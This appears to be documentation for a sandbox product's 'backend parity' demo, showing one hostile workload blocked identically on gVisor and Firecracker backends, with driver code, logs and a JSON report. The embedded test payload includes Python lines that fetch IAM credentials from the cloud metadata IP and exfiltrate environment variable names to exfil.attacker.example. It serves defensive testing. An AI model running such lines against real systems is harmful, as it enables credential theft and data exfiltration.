Demo: backend parity

Same workload. Three kernels. One verdict.

One SessionBackend interface, three isolation technologies behind it. The same hostile request runs on Docker, gVisor, and Firecracker — and produces the same denied egress, no leaked secret, the same verdict shape. The guarantees live above the backend.

Overview#

Source: demo/src/scenarios/backend-parity.ts — every claim and snippet on this page reflects that driver. It submits one hostile workload through the public SDK against each target control plane and asserts that every backend produces an identical security verdict.

Enclave's orchestrator, audit log, and egress policy are backend-agnostic (invariant 2). New behaviour goes through a single SessionBackend interface, so every isolation path inherits it. That makes the choice of isolation technology an operational decision — not a security one. You pick the kernel; the safety contract does not move.

The driver proves it the blunt way: take one hostile workload — code that SSRFs the cloud metadata IP 169.254.169.254 and exfiltrates to exfil.attacker.example — and run the exact same request against each backend. The verdict it asserts on every one: egress_denied for both targets and no secret returned (no eyJ… JWT in any public surface). There is no in-sandbox session credential at all (it was removed); the brokered secrets the control plane does hold — the git-clone token and the service-binding secrets — are injected at the boundary (init-container / egress proxy), never onto a public surface (invariant 1).

demo/src/scenarios/backend-parity.ts:L64–L87typescript
  `import os, json, urllib.request`,
  ``,
  `# 1. SSRF the cloud metadata IP for IAM credentials (the classic heist).`,
  `try:`,
  `    urllib.request.urlopen("http://${METADATA_IP}/latest/meta-data/iam/security-credentials/")`,
  `except Exception as e:`,
  `    print("metadata fetch blocked:", e)`,
  ``,
  `# 2. Exfiltrate anything we can find to an attacker-controlled host.`,
  `try:`,
  `    urllib.request.urlopen("http://${ATTACKER_HOST}/exfil?dump=" + ",".join(os.environ.keys()))`,
  `except Exception as e:`,
  `    print("exfil blocked:", e)`,
  ``,
  `enclave.result({"egressAttempted": True})`,
].join("\n");

/** A target control plane to run the workload against. */
interface Target {
  /** Display label (the isolation tech — docker / gvisor / firecracker / simulator-a). */
  label: string;
  baseUrl: string;
  apiKey?: string;
  /** Set when we booted it ourselves and must close it. */
gVisor / KubernetesFirecracker / KVMexit 0 · 2/2 · parity
capturedpnpm demo:backend-parityexit 0 · 2/2 · gVisor + Firecracker
▣ Enclave — Same workload. Three kernels. One verdict.
backend parity (invariant 2): identical egress + secret-withholding verdict across isolation tech
mode: real:multi  ·  backends: gvisor, firecracker

┌──────────────────────────────────────────────┐
│ backend: gvisor
│ http://127.0.0.1:8090
├──────────────────────────────────────────────┤
│  egress_denied  169.254.169.254, exfil.attacker.example
│  no secret leaked  no eyJ JWT in any public surface
└──────────────────────────────────────────────┘

┌──────────────────────────────────────────────┐
│ backend: firecracker
│ http://127.0.0.1:8091
├──────────────────────────────────────────────┤
│  egress_denied  169.254.169.254, exfil.attacker.example
│  no secret leaked  no eyJ JWT in any public surface
└──────────────────────────────────────────────┘
The driver run: the identical hostile workload submitted to the gVisor/Kubernetes and Firecracker/KVM control planes, each returning the same denied egress, no leaked secret, the same verdict.· evidence/captures-real/backend-parity.log

Architecture#

The picture below is the whole argument. The guarantees sit in one backend-agnostic core; the SessionBackend interface fans out to three concrete legs. Auth, tenancy, secret withholding, and egress policy are enforced above the fork, so each leg gets the same contract by construction.

The driver does not select a backend per request. It picks the set of backends from the environment — one control plane URL per isolation tech — and runs the identical request against each. ENCLAVE_PARITY_BASE_URLS is a label=url,label=url list (optionally paired with ENCLAVE_PARITY_API_KEYS on the same labels):

demo/src/scenarios/backend-parity.ts:L142–L153typescript
    }));
    return { targets, mode: "real:multi" };
  }

  if (process.env.ENCLAVE_BASE_URL) {
    const label = process.env.ENCLAVE_BACKEND ?? "backend";
    return {
      targets: [
        {
          label,
          baseUrl: process.env.ENCLAVE_BASE_URL,
          apiKey: process.env.ENCLAVE_API_KEY ?? undefined,

Each target is then driven by the same runOnce: the request body — code, language, and egress — is byte-identical; only the baseUrl (and optional apiKey) of the EnclaveClient differs.

demo/src/scenarios/backend-parity.ts:L191–L217typescript

  const denied = deniedHosts(audit);
  const leaked = JWT_RE.test(JSON.stringify({ session, audit, result: session.result }));

  const verdict: Verdict = {
    egressDenied: denied.includes(METADATA_IP) && denied.includes(ATTACKER_HOST),
    deniedHosts: denied,
    tokenWithheld: !leaked,
    phase: session.phase,
  };

  await enclave.teardown(handle.id).catch(() => {});
  return { verdict, session, audit };
}

/** Print one side-by-side tile for a backend. */
function printTile(t: Target, v: Verdict): void {
  const bar = "─".repeat(46);
  const egressLine = v.egressDenied
    ? `${C.green}✓ egress_denied${C.reset}  ${C.dim}${METADATA_IP}, ${ATTACKER_HOST}${C.reset}`
    : `${C.red}✗ egress NOT fully denied${C.reset}  ${C.dim}[${v.deniedHosts.join(", ") || "none"}]${C.reset}`;
  const tokenLine = v.tokenWithheld
    ? `${C.green}✓ no secret leaked${C.reset}  ${C.dim}no eyJ JWT in any public surface${C.reset}`
    : `${C.red}✗ SECRET LEAKED${C.reset}`;

  console.log(`${C.bold}${C.cyan}┌${bar}┐${C.reset}`);
  console.log(`${C.bold}${C.cyan}│${C.reset} ${C.bold}backend: ${t.label}${C.reset}`);

Note what does notappear: any backend-specific branching for security. There is no "if docker, also lock down egress" — the egress decision and the audit events are produced by the core, the same way, every time. This run drove two control planes — gVisor on Kubernetes and Firecracker on KVM — via ENCLAVE_PARITY_BASE_URLS; each leg executed the bytes and enforced the boundary in the kernel / microVM, and the two verdicts came back identical.

The verdict is identical#

For each target, the driver distils the run into a structured Verdict: were both blocked hosts in the egress_denied audit events; was any JWT leaked into the session, audit, or result; and the terminal phase. It asserts each backend produces the safe verdict, then asserts the headline: every backend produced the same verdict shape (order-independent on the denied hosts).

demo/src/scenarios/backend-parity.ts:L268–L289typescript
    fail(`backends disagreed — ${keys.size} distinct verdict shapes across ${records.length} backends`);
  }

  console.log(`${C.bold}${C.cyan}═══ verdict parity ═══${C.reset}`);
  if (parity) {
    console.log(
      `${C.bold}${C.green}✓ all ${records.length} backend(s) produced ONE identical verdict:${C.reset}`,
    );
    console.log(
      `  ${C.green}egress_denied${C.reset} [${METADATA_IP}, ${ATTACKER_HOST}]  ·  ${C.green}no secret leaked${C.reset}`,
    );
    console.log(
      `  ${C.dim}same orchestrator/audit/egress contract — only the kernel differs.${C.reset}`,
    );
  } else {
    console.log(`${C.bold}${C.red}✗ verdicts were not identical across backends.${C.reset}`);
  }
  console.log();

  console.log(
    failures === 0
      ? `${C.bold}${C.green}✓ backend parity proven across ${records.length} backend(s) — same hostile workload, same verdict.${C.reset}\n`

The verdict is built from public surfaces only — the egress_denied events carry the blocked data.host, and the JWT regex runs over { session, audit, result }. Same event types, same fields, same secret withholding — regardless of which kernel ran the bytes. The secret-withholding invariant (invariant 1) holds the same way on every backend; the kernel underneath is an implementation detail.

capturedevidence/captures-real/backend-parity-report.jsonparity · 1 verdict shape
  "summary": {
    "mode": "real:multi",
    "passed": true,
    "failures": 0,
    "backendCount": 2,
    "parity": true,
    "distinctVerdictShapes": 1
  },
  "backends": [
    {
      "label": "gvisor",
      "baseUrl": "http://127.0.0.1:8090",
      "verdict": {
        "egressDenied": true,
        "deniedHosts": [
          "169.254.169.254",
          "exfil.attacker.example"
        ],
        "tokenWithheld": true,
        "phase": "succeeded"
      },
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "egress_denied",
        "egress_denied",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ]
    },
    {
      "label": "firecracker",
      "baseUrl": "http://127.0.0.1:8091",
      "verdict": {
        "egressDenied": true,
        "deniedHosts": [
          "169.254.169.254",
          "exfil.attacker.example"
        ],
        "tokenWithheld": true,
        "phase": "succeeded"
      },
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "egress_denied",
        "egress_denied",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ]
    }
  ]
The persisted evidence bundle: the gVisor/Kubernetes and Firecracker/KVM Verdicts and their audit event sequences are identical — same denied hosts, same withheld token, same audit types in the same order.· evidence/captures-real/backend-parity-report.json

When to use which#

Parity does not mean the backends are interchangeable for security. They give the same contract at the control-plane layer, but the strength of the underlying isolation differs. Choose deliberately:

Docker

host kernel

Dev convenience — not a boundary.

Runs the workload in a local container on the host kernel. No gVisor, and it can't enforce allowlist egress. Use it for fast iteration on a laptop; never treat it as containment.

gVisor (runsc)

userspace kernel

Cloud security boundary, scaled on Kubernetes.

Each session is a gVisor Job: runsc intercepts syscalls, a per-session NetworkPolicy makes egress default-deny, and the service-binding egress proxy runs as a sidecar (shipped, proven by kubernetes-bindings.e2e). The default cloud path.

Firecracker

hardware microVM

Strongest isolation, on-prem / bare-metal.

A jailer-confined microVM with its own guest kernel over KVM hardware virtualization. Built and KVM-validated. Best when you control the host and want a hardware-virt boundary rather than a shared kernel.

Roadmap, not shipped: Kata + Firecracker on Kubernetes

Today, Firecracker runs as a standalone microVM backend (KVM host with /dev/kvm), and gVisor is the path that scales on Kubernetes. The intended convergence is Kata Containers backed by Firecracker — microVMs scheduled as pods on a cluster, giving hardware-virt isolation with k8s ergonomics. This is roadmap and is not yet shipped — do not plan around it. The shipped microVM path is the standalone Firecracker backend.

Run it#

The driver follows a connect-or-boot rule. Set ENCLAVE_PARITY_BASE_URLS to a label=url list to drive one control plane per isolation tech (the real recording path); set a single ENCLAVE_BASE_URL to drive one labelled backend; set neither and it boots the in-process simulator and runs it twice to prove the verdict shape. Either way it writes evidence/backend-parity-report.{json,md} and exits non-zero on any failed assertion or verdict disagreement.

demo/package.json:L13–L13json
    "demo:backend-parity": "tsx src/scenarios/backend-parity.ts",
capturedpnpm demo:backend-parity2/2 backends · parity
═══ verdict parity ═══
 all 2 backend(s) produced ONE identical verdict:
  egress_denied [169.254.169.254, exfil.attacker.example]  ·  no secret leaked
  same orchestrator/audit/egress contract — only the kernel differs.

 backend parity proven across 2 backend(s) — same hostile workload, same verdict.
The headline assertion: the gVisor/Kubernetes and Firecracker/KVM runs produced one identical verdict. The driver exits non-zero on any per-backend failure or any verdict disagreement, so it doubles as a regression gate.· evidence/captures-real/backend-parity.log